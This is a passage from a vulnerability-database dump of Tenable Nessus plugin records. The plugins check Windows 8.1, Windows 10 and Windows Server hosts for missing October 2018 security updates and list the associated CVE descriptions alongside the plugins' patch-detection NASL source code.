value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462937');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462937])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462941\nor cumulative update 4462926. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. 
(CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462926.NASL", "href": "https://www.tenable.com/plugins/nessus/118002", "published": "2018-10-09T00:00:00", "title": "KB4462941: Windows 8.1 and Windows Server 2012 R2 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118002);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8491\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\"\n );\n script_bugtraq_id(105477);\n script_xref(name:\"MSKB\", value:\"4462926\");\n script_xref(name:\"MSKB\", value:\"4462941\");\n script_xref(name:\"MSFT\", value:\"MS18-4462926\");\n script_xref(name:\"MSFT\", value:\"MS18-4462941\");\n\n script_name(english:\"KB4462941: Windows 8.1 and Windows Server 2012 R2 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462941\nor cumulative update 4462926. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. 
The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\");\n # https://support.microsoft.com/en-us/help/4462926/windows-8-update-kb4462926\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?554e569a\");\n # https://support.microsoft.com/en-us/help/4462941/windows-8-update-kb4462941\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d16a66a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4462941 or Cumulative Update KB4462926.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462926', '4462941');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = 
hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462926, 4462941])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462919.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. 
An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. 
(CVE-2018-8489)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An Elevation of Privilege vulnerability exists in\n Windows Subsystem for Linux when it fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could execute arbitrary\n code and take control of an affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8329)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462919.NASL", "href": "https://www.tenable.com/plugins/nessus/117999", "published": "2018-10-09T00:00:00", "title": "KB4462919: Windows 10 Version 1803 and Windows Server Version 1803 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117999);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8329\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\",\n \"CVE-2018-8506\",\n \"CVE-2018-8509\",\n \"CVE-2018-8530\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462919\");\n script_xref(name:\"MSFT\", value:\"MS18-4462919\");\n\n script_name(english:\"KB4462919: Windows 10 Version 1803 and Windows Server Version 1803 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462919.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. 
(CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. 
(CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. 
An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An Elevation of Privilege vulnerability exists in\n Windows Subsystem for Linux when it fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could execute arbitrary\n code and take control of an affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8329)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
